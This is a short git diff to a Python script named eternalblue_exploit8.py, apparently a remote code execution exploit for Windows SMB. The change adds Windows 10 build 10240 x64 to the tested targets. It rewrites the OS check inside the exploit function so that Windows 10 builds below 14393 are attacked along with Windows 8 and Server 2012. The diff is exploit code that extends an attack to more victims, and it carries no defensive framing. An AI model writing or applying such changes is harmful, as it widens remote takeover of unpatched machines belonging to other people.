diff --git a/eternalblue_exploit8.py b/eternalblue_exploit8.py index 0252599..42a89ee 100644 --- a/eternalblue_exploit8.py +++ b/eternalblue_exploit8.py @@ -12,6 +12,7 @@ The exploit support only x64 target Tested on: - Windows 2012 R2 x64 - Windows 8.1 x64 +- Windows 10 Pro Build 10240 x64 Default Windows 8 and later installation without additional service info: @@ -453,7 +454,12 @@ def exploit(target, shellcode, numGroomConn): conn.login(USERNAME, PASSWORD) server_os = conn.get_server_os() print('Target OS: '+server_os) - if not (server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ")): + if server_os.startswith("Windows 10 "): + build = int(server_os.split()[-1]) + if build >= 14393: # version 1607 + print('This exploit does not support this target') + sys.exit() + elif not (server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ")): print('This exploit does not support this target') sys.exit()